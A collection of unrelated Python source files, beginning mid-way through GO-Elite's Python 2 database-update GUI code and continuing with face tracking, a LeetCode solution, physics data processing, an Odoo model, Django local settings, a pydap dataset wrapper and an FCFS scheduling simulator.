if root !='' and root !=None: WarningWindow(print_out,print_out); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
else: print print_out
def getOnlineEliteConfig(file_location_defaults,root):
base_url = file_location_defaults['url'].Location()
#fln,status = update.download(base_url+'Databases/','Databases/','')
fln1,status1 = update.download(base_url+'Config/species_all.txt','Config/','')
try:
if 'Internet' not in status1:
fln2,status2 = update.download(base_url+'Config/source_data.txt','Config/','')
fln3,status3 = update.download(base_url+'Config/versions.txt','Config/','')
#fln4,status4 = update.download(base_url+'Config/resource_list.txt','Config/','')
print 'Finished downloading the latest configuration files.'; root.destroy()
else:
run_parameter = 'skip'
try: WarningWindow(status3,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
except Exception: print status3; root.destroy(); sys.exit()
except Exception: null=[]
def buildInferrenceTables(species_code):
try: gene_associations.swapAndExportSystems(species_code,'Ensembl','EntrezGene') ### Allows for analysis of Ensembl IDs with EntrezGene based GO annotations (which can vary from Ensembl)
except Exception: null=[] ### Occurs if EntrezGene not supported
try: gene_associations.augmentEnsemblGO(species_code)
except Exception: null=[] ### Occurs if EntrezGene not supported
### Build out these symbol association files
try: gene_associations.importGeneData(species_code,('export','Ensembl'))
except Exception: null=[] ### Occurs if EntrezGene not supported
try: gene_associations.importGeneData(species_code,('export','EntrezGene'))
except Exception: null=[] ### Occurs if EntrezGene not supported
def getAdditionalOnlineResources(species_code,additional_resources,root):
if additional_resources == 'All Resources':
additional_resources = importResourceList()
else: additional_resources = [additional_resources]
try:
print 'Adding supplemental GeneSet and Ontology Collections'
import GeneSetDownloader; force = 'yes'
GeneSetDownloader.buildAccessoryPathwayDatabases([species_code],additional_resources,force)
print_out = 'Finished incorporating additional resources.'
except Exception:
print_out = 'Download error encountered for additional ontologies and gene-sets...\nplease try again later.'
InfoWindow(print_out,'Continue')
try: root.destroy()
except Exception: null=[]
GO_Elite.importGOEliteParameters('skip'); sys.exit()
def getOnlineEliteDatabase(file_location_defaults,db_version,new_species_codes,download_obo,additional_resources,root):
base_url = file_location_defaults['url'].Location()
if download_obo == 'yes':
fln,status = update.download(base_url+'Databases/'+db_version+'/OBO.zip','','')
for species_code in new_species_codes:
#print [base_url+'Databases/'+db_version+'/'+species_code+'.zip']
fln,status = update.download(base_url+'Databases/'+db_version+'/'+species_code+'.zip','Databases/','')
buildInferrenceTables(species_code)
### Attempt to download additional Ontologies and GeneSets
if additional_resources != '---':
if additional_resources == 'All Resources': additionalResources = importResourceList()
else: additionalResources = [additional_resources]
try:
print 'Adding supplemental GeneSet and Ontology Collections'
import GeneSetDownloader; force = 'yes'
GeneSetDownloader.buildAccessoryPathwayDatabases([species_code],additionalResources,force)
except Exception: print 'Download error encountered for additional ontologies and gene-sets...\nplease try again later.'
try: buildNestedOntologies(species_code)
except Exception: None
if 'Internet' not in status:
if len(new_species_codes)>0:
print 'Finished downloading',db_version,'species database files.'
print_out = "New species data succesfully added to database."
else:
print 'Finished downloading',db_version,'OBO database files.'
print_out = "Ontology structure data succesfully added to database."
InfoWindow(print_out,'Continue')
try: root.destroy()
except Exception: null=[]
else:
if root !='' and root !=None: WarningWindow(status,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters('skip'); sys.exit()
else: print status; root.destroy(); sys.exit()
def buildNestedOntologies(species_code):
current_species_dirs = unique.returnDirectories('/Databases')
if species_code in current_species_dirs:
try: export.deleteFolder(filepath('Databases/'+species_code+'/nested')) ### Delete the existing nested folder (will force rebuilding it)
except Exception: null=[]
### Creates a nested GO (and stores objects in memory, but not needed
system_codes,source_types,mod_types = GO_Elite.getSourceData()
#print species_code,'Building Nested for mod types:',mod_types
avaialble_ontologies = OBO_import.findAvailableOntologies(species_code,mod_types)
for ontology_type in avaialble_ontologies:
full_path_db,path_id_to_goid,null = OBO_import.buildNestedOntologyAssociations(species_code,mod_types,ontology_type)
def exportEntrezGO(tax_ids,species_codees,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG,root):
if 'over-write previous' in overwrite_entrezgo: overwrite_entrezgo = 'over-write previous' ### The config name is longer
if 'Internet' not in status:
import BuildAffymetrixAssociations
index = 0
print "Begining to parse NCBI Gene Ontology annotations..."
for species_code in species_codees:
tax_id = tax_ids[index]
if len(tax_id)>0: print "Looking for %s EntrezGene to Gene Ontology associations" % species_code
try: run_status = BuildAffymetrixAssociations.parseGene2GO(tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG)
except Exception: run_status = 'no'
index+=1
if run_status == 'run':
print_out = 'Finished building EntrezGene-GeneOntology associations files.'
if remove_download_files == 'yes':
status = export.deleteFolder('BuildDBs/Entrez/Gene2GO'); print status
InfoWindow(print_out,'Update Complete!')
continue_to_next_win = Button(text = 'Continue', command = root.destroy)
continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
else:
print_out = 'Gene2GO file not found. Select download to obtain database prior to extraction'
WarningWindow(print_out,'File Not Found!')
print '\nThe file "gene2go.txt" was not found.\n';
root.destroy() ###Have to destroy status interface
root = Tk(); root.title('GO-Elite: Update Options')
gu = GUI(root,option_db,option_list)
update_go_entrez = gu.Results()['update_go_entrez']
if update_go_entrez == 'yes':
root = Tk(); analysis = 'DownloadEntrezGO'
values = ncbi_go_file,'BuildDBs/Entrez/Gene2GO/','txt',tax_ids,species_codees,overwrite_entrezgo,rewrite_existing_EG
StatusWindow(root,'DownloadEntrezGO',values)
#fln,status = update.download(ncbi_go_file,'BuildDBs/Entrez/Gene2GO/','txt')
#exportEntrezGO(tax_id,species_code,status,option_db,option_list,root)
else:
#print_out = 'Gene2GO file not found. Select download to obtain database prior to extraction'
#WarningWindow(print_out,'File Not Found!'); root.destroy();
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
else: WarningWindow(status,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
class importEnsemblSQL:
def __init__(self,species,species_full,child_dirs,externalDBName_list,overwrite_previous,rewrite_existing,force,ensembl_version,external_system,root):
self._parent = root; import EnsemblSQL
if process_Ens_go == 'yes': externalDBName_list.append('GO')
configType = 'Basic'; iteration=0; proceed = 'yes'
### Export Ensembl version information
try: current_dirversion = unique.getCurrentGeneDatabaseVersion()
except Exception: current_dirversion = ''
dirversion = string.replace(ensembl_version,'release-','EnsMart')
if dirversion not in current_dirversion:
### For example: if EnsMart56Plus is current and EnsMart56 is the selected version, keep EnsMart56Plus as current
exportDBversion(dirversion)
### Instead of getting the current version info, get the specific version
if ensembl_version != 'current':
try:
child_dirs, ensembl_species, ensembl_versions = EnsemblSQL.getCurrentEnsemblSpecies(ensembl_version)
except Exception,e:
print_out = "A internet connection could not be established.\nPlease fix the problem before proceeding."
WarningWindow(e,'Warning!'); root.destroy(); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
if species_full not in ensembl_species:
print_out = 'The selected species is unavailable for\nthe selected version of Ensembl.'
WarningWindow(print_out,'Species Unavailable!')
root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
if proceed == 'yes':
ensembl_sql_dir,ensembl_sql_description_dir = child_dirs[species_full]
for externalDBName in externalDBName_list:
if externalDBName != ' ':
if force == 'yes' and iteration == 1: force = 'no'
import EnsemblSQL; reload(EnsemblSQL)
if force == 'yes':
output_dir = 'BuildDBs/EnsemblSQL/'+species+'/'
try:
if force == 'yes': ### Delete any existing data in the destination directory that can muck up tables from a new Ensembl build
export.deleteFolder(output_dir)
except Exception: null=[]
if externalDBName in array_db:
analysisType = 'FuncGen'
try: EnsemblSQL.buildGOEliteDBs(species,ensembl_sql_dir,ensembl_sql_description_dir,externalDBName,configType,analysisType,overwrite_previous,rewrite_existing,external_system,force); iteration+=1
except Exception, e:
print traceback.format_exc()
print_out = 'This version of Ensembl appears to have critical incompatibilites with GO-Elite.\nDownload the latest version of GO-Elite or contact the development team'
WarningWindow(print_out,'Species Unavailable!')
root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
else:
analysisType = 'GeneAndExternal'
try: EnsemblSQL.buildGOEliteDBs(species,ensembl_sql_dir,ensembl_sql_description_dir,externalDBName,configType,analysisType,overwrite_previous,rewrite_existing,external_system,force); iteration+=1
except Exception, e:
print_out = 'This version of Ensembl appears to have critical incompatibilites with GO-Elite.\nDownload the latest version of GO-Elite or contact the development team'
WarningWindow(print_out,'Species Unavailable!')
root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
if remove_download_files == 'yes': export.deleteFolder('BuildDBs/EnsemblSQL/'+species)
print_out = 'Finished installing the selected Ensembl databases.'
InfoWindow(print_out,'Update Complete!')
continue_to_next_win = Button(text = 'Continue', command = root.destroy)
continue_to_next_win.pack(side = 'right', padx = 10, pady = 10);
quit_button = Button(root,text='Quit', command=self.quit)
quit_button.pack(side = 'right', padx = 10, pady = 10)
root.mainloop()
GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
def quit(self):
#print "quit starts"
#print "cleaning up things..."
self._parent.quit()
self._parent.destroy()
sys.exit()
def importExternalDBs(species_full):
filename = 'Config/EnsExternalDBs.txt'
fn=filepath(filename); x = 0; external_dbs=[]; external_system={}; all_databases={}; external_ids={}
for line in open(fn,'rU').readlines():
data = cleanUpLine(line)
if x==0: x=1
else:
id, database, species_specific, exclude, system_code = string.split(data,'\t')
external_ids[database] = int(id)
if database != 'GO':
all_databases[database]=system_code
if (species_full == species_specific) or len(species_specific)<2:
if len(exclude)<2:
external_system[database] = system_code
filename = 'Config/external_db.txt'; external_system2={}
fn=filepath(filename)
for line in open(fn,'rU').readlines():
data = cleanUpLine(line)
try:
t = string.split(data,'\t'); id = int(t[0]); database = t[1]
external_ids[database] = id
if database in external_system:
external_system2[database] = external_system[database]
elif database not in all_databases: ### Add it if it's new
try:
try: system = database[:3]
except Exception: system = database[:2]
external_system2[database] = system
except Exception: null=[]
except Exception: null=[] ### Occurs when a bad end of line is present
filename = 'Config/array.txt'
global array_db; array_db={}
fn=filepath(filename)
for line in open(fn,'rU').readlines():
data = cleanUpLine(line)
t = string.split(data,'\t')
try:
array = t[1]; vendor = t[3]
database = vendor+'_'+array; array_db[database]=[]
if database in external_system:
external_system2[database] = external_system[database]
if database in all_databases:
external_system2[database] = all_databases[database]
elif database not in all_databases: ### Add it if it's new
try:
if vendor == 'AFFY': system = 'X'
if vendor == 'ILLUMINA': system = 'Il'
if vendor == 'CODELINK': system = 'Co'
if vendor == 'AGILENT': system = 'Ag'
else: system = 'Ma' ###Miscelaneous Array type
external_system2[database] = system
except Exception: null=[]
except Exception: null=[]
external_system = external_system2
#try: del external_system['GO']
#except Exception: null=[]
for database in external_system: external_dbs.append(database)
external_dbs.append(' '); external_dbs = unique.unique(external_dbs); external_dbs.sort()
return external_dbs,external_system,array_db,external_ids
def downloadFiles(file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG,root):
fln,status = update.download(file,dir,file_type)
if 'Internet' in status:
WarningWindow(status,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
else:
exportEntrezGO(tax_id,species_code,status,{},{},overwrite_entrezgo,rewrite_existing_EG,root)
def testPNGView():
tl = Toplevel()
sf = PmwFreeze.ScrolledFrame(tl,
labelpos = 'n', label_text = '',
usehullsize = 1, hull_width = 800, hull_height = 550)
sf.pack(padx = 0, pady = 0, fill = 'both', expand = 1)
frame = sf.interior()
filename = "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/3'Array/Kristina-Athro/DataPlots/WP1403-GE.Homozygot_vs_Control_AMPK signaling.png"
tl.title(filename)
img = ImageTk.PhotoImage(file=filename)
can = Canvas(frame)
can.pack(fill=BOTH, padx = 0, pady = 0)
w = img.width()
h = height=img.height()
can.config(width=w, height=h)
can.create_image(2, 2, image=img, anchor=NW)
tl.mainloop()
if __name__ == '__main__':
user_variables=[]
run_parameter = 'intro'
vals = getUserParameters(run_parameter)
print vals
|
"""
Created by Alex Wang
On 2018-07-20
"""
import os
import sys
import shutil
import traceback
import numpy as np
import cv2
from face import face_detect
import sort
import opencv_trackers
def rectangle(image, x, y, w, h, color, thickness=2, label=None):
"""Draw a rectangle.
Parameters
----------
x : float | int
Top left corner of the rectangle (x-axis).
y : float | int
Top let corner of the rectangle (y-axis).
w : float | int
Width of the rectangle.
h : float | int
Height of the rectangle.
label : Optional[str]
A text label that is placed at the top left corner of the
rectangle.
"""
pt1 = int(x), int(y)
pt2 = int(x + w), int(y + h)
cv2.rectangle(image, pt1, pt2, color, thickness)
if label is not None:
text_size = cv2.getTextSize(
label, cv2.FONT_HERSHEY_PLAIN, 1, thickness)
center = pt1[0] + 5, pt1[1] + 5 + text_size[0][1]
pt2 = pt1[0] + 10 + text_size[0][0], pt1[1] + 10 + text_size[0][1]
cv2.rectangle(image, pt1, pt2, color, -1)
cv2.putText(image, label, center, cv2.FONT_HERSHEY_PLAIN,
1, (255, 255, 255), thickness)
def recreate_dir(dir_path):
if os.path.exists(dir_path):
shutil.rmtree(dir_path)
os.makedirs(dir_path)
def face_detect_frame():
method_type = 'hog'
video_root = '/Users/alexwang/data'
video_list = ['14456458.mp4', '32974696.mp4', '16815015.mp4', '10616634.mp4']
colours = np.random.rand(32, 3) * 256 # used only for display
print('start process videos...')
for video_name in video_list:
video_tracker = sort.Sort(max_age=5)
kal = sort.KalmanBoxTracker([0, 0, 1, 1, 0])
kal.clear_count()
cap = cv2.VideoCapture(os.path.join(video_root, video_name))
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
output_path = os.path.join(video_root, 'notexpand_{}_{}'.format(method_type, video_name))
out = cv2.VideoWriter(output_path, cv2.VideoWriter_fourcc(*'MP4V'), 15, (frame_width, frame_height))
while (cap.isOpened()):
try:
ret, frame = cap.read()
if not ret:
break
image_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if method_type == 'cnn':
face_img_list = face_detect.cnn_face_detect(image_rgb, expand=False)
else:
face_img_list = face_detect.hog_face_detect(image_rgb, expand=False)
detections = []
for (face, rect, score) in face_img_list:
if score < 0.4:
continue
x_min, y_min, x_max, y_max = rect
detections.append([x_min, y_min, x_max, y_max, 10 * score])
print('detections:', detections)
track_bbs_ids = video_tracker.update(np.asarray(detections))
for d in track_bbs_ids:
print('d:', d)
d = d.astype(np.int32)
rectangle(frame, d[0], d[1], d[2] - d[0],
d[3] - d[1], colours[d[4] % 32, :],
thickness=2, label=str(d[4]))
cv2.imshow('image', frame)
out.write(frame)
# Exit if ESC oressed
key = cv2.waitKey(1) & 0xff
if key == 27:
sys.exit(0)
elif key == ord('q'):
break
except Exception as e:
traceback.print_exc()
cap.release()
out.release()
def test_Kalman():
kalman = sort.KalmanBoxTracker([260, 69, 78, 85, 1.2872009431190912])
i = 0
dets = np.asarray([[260, 69, 78, 85, 1.1129303132362787]])
print(dets[i, :])
def test_opencv_tracker():
method_type = 'hog'
video_root = '/Users/alexwang/data'
video_list = ['32974696.mp4', '14456458.mp4', '16815015.mp4', '10616634.mp4']
colours = np.random.rand(32, 3) * 256 # used only for display
print('start process videos...')
for video_name in video_list:
video_tracker = opencv_trackers.Trackers()
cap = cv2.VideoCapture(os.path.join(video_root, video_name))
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
output_path = os.path.join(video_root, 'notexpand_opencv_{}_{}'.format(method_type, video_name))
out = cv2.VideoWriter(output_path, cv2.VideoWriter_fourcc(*'MP4V'), 15, (frame_width, frame_height))
frame_idx = 0
frame_gap = 3
while (cap.isOpened()):
try:
ret, frame = cap.read()
if not ret:
break
frame_idx += 1
image_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if frame_idx % frame_gap == 1:
if method_type == 'cnn':
face_img_list = face_detect.cnn_face_detect(image_rgb, expand=False)
else:
face_img_list = face_detect.hog_face_detect(image_rgb, expand=False)
detections = []
for (face, rect, score) in face_img_list:
if score < 0.4:
continue
x_min, y_min, x_max, y_max = rect
detections.append([x_min, y_min, x_max, y_max, 10 * score])
# print('detections:', detections)
if frame_idx % frame_gap == 1:
track_bbs_ids = video_tracker.update_and_detect(frame, np.asarray(detections))
else:
track_bbs_ids = video_tracker.update(frame)
for tracker_info in track_bbs_ids:
d = tracker_info['box']
d = np.asarray(list(d))
print('d:', d)
d = d.astype(np.int32)
rectangle(frame, d[0], d[1], d[2] - d[0],
d[3] - d[1], colours[tracker_info['count'] % 32, :],
thickness=2, label=str(tracker_info['count']))
cv2.imshow('image', frame)
out.write(frame)
# Exit if ESC oressed
key = cv2.waitKey(1) & 0xff
if key == 27:
sys.exit(0)
elif key == ord('q'):
break
except Exception as e:
traceback.print_exc()
cap.release()
out.release()
if __name__ == "__main__":
face_detect_frame()
# test_Kalman()
# test_opencv_tracker()
|
class Solution:
def wordPattern(self, pattern: str, s: str) -> bool:
dic = dict()
x = s.split()
i = j = 0
pen = sen = ""
di = dict()
ic = dict()
if len(x) != len(pattern):
return False
for p in pattern:
if p not in di.keys():
di[p] = i
i += 1
pen += str(di[p]) +" "
for t in x:
if t not in ic.keys():
ic[t] = j
j += 1
sen += str(ic[t]) +" "
return True if pen == sen else False |
import os,sys
import numpy as np
import ROOT
from root_numpy import root2array, root2rec, tree2rec
import pandas as pd
from badchtable import get_badchtable
from pulsed_list import get_pulsed_channel_list
def get_index( crate, slot, femch ):
index = crate*64*15 + (slot-4)*64 + femch
return index
def get_pulsed_index_array( pulsed_list ):
pulsed_indices = []
for (crate,slot,femch) in pulsed_list:
index = get_index( crate,slot,femch )
pulsed_indices.append( index )
return pulsed_indices
def make_adc_matrix(run):
ampcov = np.zeros( (9600,9600) )
npzfile = 'output/run%03d.npz'%(run)
if not os.path.exists(npzfile):
print "skip ",npzfile
return
print "extracting ",npzfile
datanpz = np.load( npzfile )
data = datanpz['outdf']
df = pd.DataFrame( data )
# index channels
df['hist_index'] = np.vectorize( get_index )( df['crate'], df['slot'], df['femch'] )
df.drop( 'index', axis=1, inplace=True )
print df.columns
outarr = df.to_records()
#x1 = df.sort('hist_index')['mean_amp'].values
x1 = df.sort('hist_index')['max_amp'].values
y1 = np.zeros(9600)
y1[ df.sort('hist_index')['hist_index'].values ] = x1[:]
#x1[:] /= df['mean_ped_mean'].values
xx = np.outer( y1, y1 )
xx = np.sqrt(xx)
pulsed = df[ df['pulsed']==1 ]['hist_index'].values
badch = df[ df['badch']==1 ]['hist_index'].values
print "NPULSED:",len(pulsed)
print pulsed
return xx, pulsed,badch
if __name__ == "__main__":
run = 83
result,pulsed,badch = make_adc_matrix(run)
np.savez('covamp_run%03d'%(run),mat=result,pulsedlist=pulsed,badchlist=badch)
|
import os
import re
import glob
# global comment tracker
in_comment_section = False
prev_comment_section = False
# returns either an empty string, the unmodified line, or a replaced line
def process_line(line):
global in_comment_section
global prev_comment_section
section_match = re.compile(r'^\s{0,}// #')
line_match = re.compile(r'^\s{0,}// ')
space_match = re.compile(r'^\s{0,}//$')
code_section_match = re.compile(r'^\s{0,}// ~~~~')
prev_comment_section = in_comment_section
if section_match.match(line):
return ''
elif code_section_match.match(line):
return ''
if space_match.match(line):
outline = space_match.sub('', line)
elif line_match.match(line):
if not in_comment_section:
outline = line_match.sub('/** ', line)
else:
outline = line_match.sub('', line)
#print(outline)
in_comment_section = True
else:
if (len(line) > 0):
in_comment_section = False
if not in_comment_section and prev_comment_section:
outline = '*/\n{}'.format(line)
else:
outline = line
# delete empty lines inside of comments
if len(outline.strip(' ').strip('\t').strip('\n')) == 0 and in_comment_section:
outline = ''
return outline
def main():
parse_ext = '.h'
src_dir = os.path.abspath('modules')
infiles = glob.glob(src_dir+'/*.h')
for infile in infiles:
print("Parsing {}".format(infile))
newlines = ''
with open(infile, 'r') as f:
newlines = list(map(process_line, f.readlines()))
with open(infile, 'w') as f:
for line in newlines:
f.write(line)
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
from odoo import models, api, fields
from datetime import date
class HrContract(models.Model):
_inherit = 'hr.contract'
historial_salario_ids = fields.One2many('contract.historial.salario','contract_id', 'Historial Salario')
@api.multi
def write(self, vals):
res = super(HrContract, self).write(vals)
if vals.get('state','')=='open':
for contract in self:
self.env['contract.historial.salario'].create({'fecha_sueldo': date.today(),
'sueldo_mensual':contract.wage,
'sueldo_diario' : contract.sueldo_diario,
'sueldo_por_hora': contract.sueldo_hora,
'sueldo_diario_integrado' : contract.sueldo_diario_integrado,
'sueldo_base_cotizacion' : contract.sueldo_base_cotizacion,
'contract_id' : contract.id,
})
return res
|
import os
from .common import Common
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
class Local(Common):
DEBUG = True
SECRET_KEY = 'local'
# Testing
ALLOWED_HOSTS = [
"*",
]
INSTALLED_APPS = Common.INSTALLED_APPS
INSTALLED_APPS += (
'uritemplate',
'corsheaders',
'django_nose',
)
MIDDLEWARE = (
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = [
BASE_DIR,
'-s',
'--nologcapture',
'--with-coverage',
'--with-progressive',
'--cover-package=jiaju'
]
# Mail
EMAIL_HOST = 'localhost'
EMAIL_PORT = 1025
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
CORS_ORIGIN_WHITELIST = [
"http://localhost:8088",
]
|
import logging
import os, sys
import json
import time
import numpy as np
#from pydap.handlers.dap import DAPHandler
from pydap.client import open_url#, Functions
from pydap.cas.urs import setup_session
HOME = os.path.expanduser('~')
info = os.path.join(HOME, '.earthdataloginrc')
if os.path.isfile(info):
with open(info, 'rb') as fid:
info = json.load(fid)
USER = info['user']
PASSWD = info['passwd']
else:
USER = None
PASSWD = None
FAILEDFMT = 'Attempt {:2d} of {:2d} - Failed to get {}'
LITTLEEND = sys.byteorder == 'little'
NATIVE = LITTLEEND and '<' or '>'
SWAPPED = LITTLEEND and '>' or '<'
"""
class PyDAPDataset( DAPHandler ):
def __init__(self, url, **kwargs ):
session = kwargs.pop('session', None)
if not session:
session = setup_session( kwargs.get('username', decoder(USER)),
kwargs.get('password', decoder(PASSWD)),
check_url = url )
application = kwargs.pop('application', None)
output_grid = kwargs.pop('output_grid', True)
super().__init__(url, application, session, output_grid, **kwargs)
self.dataset.functions = Functions(url, application, session)
def __getitem__(self, key):
if self.dataset:
return self.dataset.get(key, None)
return None
def __getattr__(self, key):
if self.dataset:
return getattr(self.dataset, key, None)
return None
def __contains__(self, key):
return key in self.dataset
"""
def scaleFillData(data, atts, fillValue = None):
log = logging.getLogger(__name__);
if '_FillValue' in atts:
log.debug( 'Searching for Fill Values in data' );
bad = (data == atts['_FillValue'])
else:
log.debug( "No '_FillValue' attribute" );
bad = None
if 'missing_value' in atts:
log.debug( 'Searching for missing values in data' );
if bad is None:
bad = (data == atts['missing_value']);
else:
bad = ((data == atts['missing_value']) | bad);
else:
log.debug( "No 'missing_value' attribute" );
if 'scale_factor' in atts and 'add_offset' in atts:
log.debug( "Scaling to data" );
data = data * atts['scale_factor'] + atts['add_offset']
if bad is not None:
if np.sum(bad) > 0:
log.debug( 'Replacing missing and fill values with NaN characters' );
if data.dtype.kind != 'f':
log.debug( 'Converting data to floating point array' );
data = data.astype(np.float32);
data[bad] = np.nan if fillValue is None else fillValue;
return data
class PyDAPDataset():
def __init__(self, url, **kwargs):
self._session = None
self._dataset = None
self.log = logging.getLogger(__name__)
self.url = url
self.retry = kwargs.get('retry', 3)
self.kwargs = kwargs
self._initDataset()
def __getitem__(self, key):
if self._dataset:
return self._dataset.get(key, None)
return None
def __getattr__(self, key):
if self._dataset:
return getattr(self._dataset, key, None)
return None
def _initSession(self):
"""
Initiailze pydap session for loading data
Initialize a session for a data set given a username, password, and
URL for the data. Any previously open sessions are closed
"""
self.log.debug( f'Initializing session : {self.url}' )
try:
self._session.close()
except Exception as err:
self.log.debug( f'Failed to close previous session: {err}' )
try:
self._session = setup_session(
self.kwargs.get('username', USER),
self.kwargs.get('password', PASSWD),
check_url = self.url
)
except Exception as err:
self.log.error( f'Failed to start session: {err}' )
return False
return True
def _initDataset(self):
"""Open pydap dataset for reading"""
self.log.debug( f'Loading dataset : {self.url}' )
try:
self._dataset.close()
except Exception as err:
self.log.debug( f'Failed to close previous dataset: {err}' )
pass
if not self._initSession():
return False
try:
self._dataset = open_url( self.url, session = self._session )
except Exception as err:
self.log.error( f'Failed to open dataset: {err}' )
return False
return True
def _randomReload(self):
"""
Reload dataset after random delay
Close remote file, sleep random amount of time between 15 and 30 mintues,
then reopne remote dataset
"""
self.log.debug( f'Reloading dataset, closing : {self.url}' )
self.close()
dt = float( np.random.random( 1 ) )
dt = (dt + 0.5) * 1800
self.log.debug( 'Sleeping {:4.1f} mintues'.format( dt / 60.0 ) )
time.sleep( dt )
self._initDataset()
def close(self):
"""Safely close remote dataset"""
try:
self._session.close()
except:
pass
try:
self._dataset.close()
except:
pass
self._session = None
self._dataset = None
def getVarAtts( self, varName, retry = None ):
self.log.info( f'Getting attributes : {varName}' )
if not isinstance(retry, int): retry = self.retry
attempt = 0
while attempt < retry:
attempt += 1
try:
atts = self._dataset[varName].attributes
atts['dimensions'] = self._dataset[varName].dimensions
except:
self.log.warning( FAILEDFMT.format(attempt, retry, 'attributes') )
self._randomReload()
else:
return atts
return None
def getValues( self, varName, slices = None, retry = None ):
self.log.info( f'Getting data : {varName}' )
if not isinstance(retry, int): retry = self.retry
attempt = 0
dims = self._dataset[varName].shape
if slices is None:
slices = []
for i in range( len(dims) ):
slices.append( slice(0, dims[i]) )
slices = tuple( slices )
while attempt < retry:
attempt += 1
try:
values = self._dataset[varName].data[ slices ]
except:
self.log.warning(FAILEDFMT.format(attempt, retry, 'data') )
self._randomReload()
else:
return values
return None
def getVar( self, varName, slices = None, scaleandfill = False):
atts = self.getVarAtts( varName )
if atts is not None:
values = self.getValues( varName, slices = slices)
if values is not None:
if values.dtype.byteorder == SWAPPED:
dt = np.dtype( str(values.dtype).replace(SWAPPED, NATIVE) )
values = values.astype( dt )
if scaleandfill:
return scaleFillData(values, atts), atts
else:
return values, atts
return None, None
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 13 16:45:33 2021
@author: ad
"""
from collections import deque
process_list = [] #['id','arrival time','service time','state', 'waiting time'] 프로세스 리스트
process_queue = deque()
process_num = 0 #프로세스 개수
t = 0 #가상의 현재 시간
end_process = [] #Log of Process Scheduling 출력에 사용할 프로세스들의 Log 리스트
#파일 read
file = input("읽을 파일을 입력: ")
f = open(f"./example_fcfs_srt/{file}.txt",'r')
lines = f.readlines()
f.close()
#process 추출
for line in lines:
line = line.split(" ")
line = ' '.join(line).split()
line = list(map(int,line))
line.append('Not-Running')
line.append(0) #waiting time
process_list.append(line)
#process 갯수 추출
process_num = process_list.pop(0)
process_num = int(process_num[0])
#print(process_num)
#print(process_list)
#Start
cpu_state = [] #['id', 'Turnaround Time', 'Waiting Time', 'Response Time', 'Running Time']
#CPU 점유율
cpu_utilization = 0
for process in process_list:
cpu_utilization += process[2]
while(True):
#현재 cpu가 처리중인 process의 cpu time이 전부 처리되었는지 확인하여 처리 완료 시킴
if cpu_state: #cpu가 Idle 상태가 아닐 때
if cpu_state[4] == Running_cpu[2]: #cpu Running Time == service time
#종료 process 출력
Running_cpu[3]="Exit"
print(f'[{t}] PID({Running_cpu[0]}): {Running_cpu[3]}') #[t=exit time] PID([id]): [state]
#Log 기록 계산
cpu_state[1] = t - Running_cpu[1] #Turnaround_Time
end_process.append(cpu_state) #Log 리스트에 넣음
cpu_state=[] #초기화
#더이상 프로세스 리스트에 프로세스가 없으면 종료
if not process_list and process_num == len(end_process):
break
#process 중 arrival time이 현재시간인 process를 queue에 집어 넣는다.
for i in range(0, len(process_list)):
process = process_list[i]
if process[1] == t:
print(f'[{t}] PID({process[0]}): {process[3]}') #[t=arrived Time] PID([id]): [state] => Not-Running 출력
process_queue.append(process_list.pop(i)) #queue에 넣음
break
if not cpu_state and process_queue: #cpu가 Idle 상태
Running_cpu=process_queue.popleft()
#현재 cpu 상태 업데이트
cpu_state = [Running_cpu[0], 0, Running_cpu[4], t - Running_cpu[1], 1] #id, Turnaround Time, Waiting Time, Response Time, Running Time
Running_cpu[3]='Running'
#현재 process 상태 출력
print(f'[{t}] PID({Running_cpu[0]}): {Running_cpu[3]}') #[t=Running time] PID([id]): [state]
elif cpu_state:
cpu_state[4] += 1
#시간 t를 1만큼 증가
t += 1
#queue에 머무는 process의 waiting time를 1만큼 증가
for waiting_process in process_queue:
waiting_process[4] += 1
print()
#CPU 점유율 계산
cpu_utilization /= t
cpu_utilization *= 100
#각 프로세스별 Log 기록 출력
print('Log of Process Scheduling')
average_t = 0 #Average Turnaround Time
average_w = 0 #Average Waiting Time
average_r = 0 #Average Response Time
end_process.sort(key=lambda x: x[0]) #process id 기준으로 정렬
for Log in end_process:
average_t += Log[1]
average_w += Log[2]
average_r += Log[3]
print(f'PID({Log[0]}) Turnaround Time: {Log[1]} Waiting Time : {Log[2]} Response Time : {Log[3]}')
print()
print(f'Average Turnaround Time: {round(average_t/process_num, 2)}')
print(f'Average Waiting Time: {round(average_w/process_num, 2)}')
print(f'Average Response Time: {round(average_r/process_num, 2)}')
print(f'CPU Utilization : {round(cpu_utilization, 2)}%') |
